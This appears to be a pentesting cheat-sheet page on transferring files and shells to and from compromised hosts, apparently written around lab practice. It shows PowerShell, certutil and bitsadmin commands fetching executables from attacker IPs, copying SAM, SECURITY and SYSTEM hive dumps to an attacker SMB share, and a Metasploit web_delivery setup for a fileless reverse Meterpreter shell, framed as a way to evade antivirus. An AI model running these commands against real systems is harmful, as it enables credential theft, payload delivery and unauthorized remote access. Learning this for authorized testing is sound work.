> For the complete documentation index, see [llms.txt](https://notes.cavementech.com/pentesting-quick-reference/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.cavementech.com/pentesting-quick-reference/uploading-shells-transferring-files.md).

# Uploading Shells/ Transferring Files

{% embed url="<https://juggernaut-sec.com/windows-file-transfers-for-hackers/>" %}
windows cheatsheat
{% endembed %}

### Transfer files with SSH (SCP)

Best to copy to tmp folder as there are no restrictions mostly

```shell
scp /opt/LinEnum.sh pingu@10.10.10.10:/tmp  
```

```shell
scp ubuntu@192.168.1.30:/home/ubuntu/documents.txt notes.txt
```

### Python server

```python
python3 -m  http.server
```

### basic http-Server

```
http-server -p 8080
```

### Powershell downloading files

```
(new-object System.Net.WebClient).DownloadFile('http://10.9.88.34:8000/SharpHound.ps1', 'C:\Users\Administrator\Downloads\SharpHou
nd.ps1')

from cmd
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
```

<figure><img src="/files/TpfNY1M7LAt7QMvdHU5w" alt=""><figcaption></figcaption></figure>

### Certutil cmd windows

```
certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe
```

### RDP with shared folder to transfer filer - xfreerdp

```
xfreerdp /u:bob /p:HTB_@cademy_stdnt! /v:10.129.202.99 +clipboard /drive:Home,/home/kali/Downloads
```

### Download files from server to machine in Windows

```
bitsadmin /transfer myDownloadJob http://192.168.18.144:8000/ammar.txt E:\Study\CEH\ammar.txt
```

### SMB Files tranfer with impacket

start smb server on attacker machine

```
                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-smbserver desktop ~/Downloads -smb2support -username test -password test
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

```

We can also use it without specifying username and password

```
ammartiger@htb[/htb]$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

And now you can make aval this share on the windows system as a separate drive

```
controller\administrator@DOMAIN-CONTROLL C:\>net use z: \\10.9.88.34\desktop /user:test test
The command completed successfully.
```

And now you can transfer files to and fro from both machines.

```
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator\Downloads>copy SharpHound.ps1 z: 
        1 file(s) copied. 
```

We can also directly move files without setting it as drive.

```
C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move security.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move system.save \\10.10.15.16\CompData
        1 file(s) moved.
```

### Evil-winrm

You can use upload and download command to transfer files

```
Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20230730011352_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Documents\20230730011352_BloodHound.zip to 20230730011352_BloodHound.zip
                                        
Info: Download successful!
```

### Other web servers complete list

{% embed url="<https://gist.github.com/willurd/5720255>" %}

<figure><img src="/files/RNzMlsSa4dVEZKTdg39q" alt=""><figcaption></figcaption></figure>

### Getting a Meterpreter shell on a compromised Windows machine

```
exploit(multi/script/web_delivery)
```

<figure><img src="/files/RTlvuwQALF6PXvPSEmaq" alt=""><figcaption></figcaption></figure>

* `exploit/`: Indicates the use of a module designed to take advantage of a specific vulnerability or system configuration to execute code.
* `multi/`: Signifies that the module is cross-platform and can target multiple operating systems (Windows, Linux, macOS).
* `script/`: Specifies that the exploit delivers its payload via a script (like PowerShell, Python, or PHP).
* `web_delivery`: The name of the module that hosts a payload on a temporary web server. When the victim executes a specific one-liner command, it fetches and runs the payload in memory.

***

#### Utility: PowerShell & Windows Reverse Meterpreter

The primary utility of this module is to gain a fileless reverse shell. Instead of sending an `.exe` file that might be caught by antivirus, you provide a single PowerShell command to the target system.

**1. Usage for Windows Reverse Meterpreter**

To use this for a Windows target, you would configure the module within Metasploit as follows:

* Set Target: `set TARGET 2` (This selects the PowerShell target, as seen in your screenshot where `target => 2`).
* Set Payload: `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
* Set Local Host: `set LHOST [Your_IP]`
* Execute: Type `run` or `exploit`.

**2. Full Use with PowerShell**

Once you hit `run`, Metasploit will generate a unique PowerShell "one-liner." It looks something like this: `powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -RunAs [Encoded_Command_String]`

<figure><img src="/files/Hbd3Ww8w1ZUkcD6bQBPM" alt=""><figcaption></figcaption></figure>

**Why this is effective:**

* Antivirus Evasion: Because the payload is executed directly in memory via PowerShell, it never touches the hard drive, making it harder for standard antivirus programs to detect.
* Simplicity: You only need a way to execute a single line of text on the victim's machine (e.g., via a compromised web server, a malicious shortcut, or a macro).
